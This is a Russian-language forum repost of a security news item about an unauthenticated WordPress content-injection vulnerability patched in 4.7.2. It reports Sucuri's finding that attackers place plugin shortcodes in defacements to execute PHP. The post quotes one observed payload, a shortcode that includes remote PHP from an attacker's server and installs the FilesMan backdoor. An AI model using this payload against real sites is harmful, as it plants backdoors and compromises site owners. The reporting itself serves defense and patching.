DzSoft
3T
- Регистрация
- 13 Сен 2007
- Сообщения
- 357
- Реакции
- 296
- Автор темы
- #1
Напомню, что свежая уязвимость была устранена с выходом Для просмотра ссылки Войди
Уязвимость позволяет неавторизованному атакующему сформировать специальный запрос, при помощи которого можно будет изменять и удалять содержимое любого поста на целевом сайте. Кроме того, используя шорткоды плагинов, злоумышленник может эксплуатировать и другие уязвимости CMS, которые обычно недоступны даже пользователям с высокими привилегиями. В итоге атакующий может внедрить на страницы сайта SEO-спам, рекламу, и даже исполняемый PHP-код, все зависит от доступных плагинов.
Эксперты компании Sucuri Для просмотра ссылки Войди
Исследователи пишут, что теперь дефейс-сообщения хакеров содержат шорткоды для вышеупомянутых плагинов. То есть добавив к своим дефейсам PHP-код, злоумышленники могут добиться его выполнения. В блоге компании эксперты приводят следующий пример, замеченный ими в ходе изучения атак:
content:»[insert_php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/insert_php]
»,PHP:include(‘http[:]//acommeamour.fr/tmp/xx.php’);
«id»:»61a»}
Данный пример приводит к скачиванию бэкдора FilesMan и его установке в директорию /wp-content/uploads/.
Теперь специалисты Sucuri рекомендуют администраторам отключить все потенциально опасные плагины и обновиться до WordPress 4.7.2, если они по какой-то причине еще этого не сделали. Исследователи поясняют, что такие атаки – это способ монетизации уязвимости. Тогда как обычными дефейсами много не заработаешь, размещение бекдора на сервере жертвы позволяет злоумышленникам вернуться позже, даже после устранения оригинальной уязвимости, и разместить на скомпрометированном ресурсе SEO-спам, рекламу или малварь.
Источник: Для просмотра ссылки Войди